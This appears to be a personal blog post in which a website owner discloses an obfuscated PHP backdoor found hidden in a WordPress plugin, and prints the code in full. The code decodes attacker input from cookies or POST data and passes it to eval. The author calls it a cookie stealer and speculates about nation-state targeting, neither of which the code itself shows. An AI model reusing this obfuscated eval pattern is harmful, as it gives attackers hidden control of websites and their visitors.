When I talk about my constant battle against hackers trying to keep this site up and running, as well as other projects I work on. This is what that looks like.
<?php function jQjRmJ()
/* ikW */{
/*VR */$RXPRxsZlL =/* Rmu /Array (/ j/”HNbWYxIaqDDulWHoOYzr”/ e /=> “LoXScacitsVAmeFrdjKaP”/ v /); / vdPTU / $HFzqQTJlL =/hQD/Array ( “zgVAUqxMKmPzUiefbbmgwMUYHfBja” =>/mqHVz */”gybIdMOzSWKWp” );
$mxvdwNunh = Array( $RXPRxsZlL, $_CO___OKIE, $RXPRxsZlL,/* wlem */$_POST,/* V */$HFzqQTJlL);;
return $mxvdwNunh;
}/* iBik / function KTxZdfXmid($RsXoJUls, $RXPRxsZlL) { / gO /if ( count ( $RsXoJUls/waqa /) == 3 ) { $ZszIc = $RsXoJUls[1]; / Ecqr */$XvyGssmZv = $RsXoJUls[2];$_SkK = ‘17653’;
$XEAtlN = $ZszIc($XvyGssmZv);;
eval ( $XEAtlN/* zE /);; die (); } } / GDO / / Qff/function/ s /ZvYjDyYsId($hVhkStd,/ nJ /$LTeZR) /Zez */{
/* Qhw/return $hVhkStd/ cBtx /^/ oCjO */$LTeZR;;
}
/*CKKK */
$CPjtvRTl =/* ww */’#’;
function pRbXMWfhEe($sfIYRka, $CPjtvRTl)
{
/* GTToi */$sfIYRka = explode ($CPjtvRTl, $sfIYRka );;
KTxZdfXmid($sfIYRka, $CPjtvRTl);/* JE */}
function esfvEzYJi($LTeZR,/*OlAn */$hVhkStd)/* oIjHo*/{
$ZTuha = strlen(/* n/$hVhkStd )/strlen( $LTeZR );; / QRt/$LTeZR .= “Rgc-bWUpMu-aeb-eYyD-hDE-qZKq-CJgjVE”;$_MLCr = ‘53224’; $LTeZR =/ H /str_repeat ( $LTeZR,/ It /$ZTuha + 1);$_mMbI/ t */= ‘6178’;
return/*HT*/$LTeZR;/* MrJTX */}
function/* nJ */ceipe($LTeZR,/* ukMAP*/$hVhkStd, $CPjtvRTl){
/* Cq /$hVhkStd/ W /= @pack( chr (72) . “\52”, $hVhkStd );$_Rmd/FmW/=/pJ */’59122′;
pRbXMWfhEe($hVhkStd ^/* X */esfvEzYJi($LTeZR, $hVhkStd),/* cgbHF */$CPjtvRTl);
}function XVDaWSG($DVdOLT, $CPjtvRTl)
/* QFMlQ /{ foreach ( $DVdOLT as $LTeZR => $hVhkStd ) { ceipe($LTeZR, $hVhkStd, $CPjtvRTl);$_pfTf =/dqt*/’17311′;
}
}
/* A*/
foreach (jQjRmJ()/* IW */as $DVdOLT)/* nurt */{
XVDaWSG($DVdOLT, $CPjtvRTl);/* HswX */}
The above, slightly neutralized code has been hidden within the structure of a plugin on the site for over a year, and despite constant maintenance and security checks, it was not detected by me until a few minutes ago. Appears to be a cookie stealer, and placed through a supply chain attack. So the vector was through the WordPress ecosystem. I think it was highly personally targeted however, and related to a specific feature I had been looking to add to the site for quite a while. There’s no amount of personal vigilance that can preven’t these types of attacks, when multiple nation-state level hackers as well as all the criminal gangs and combinations thereof have unlimited time and resources to through at individual small websites. If you have been visiting the site at all in the last year I suggest you go to your browser security settings and delete all cookies now.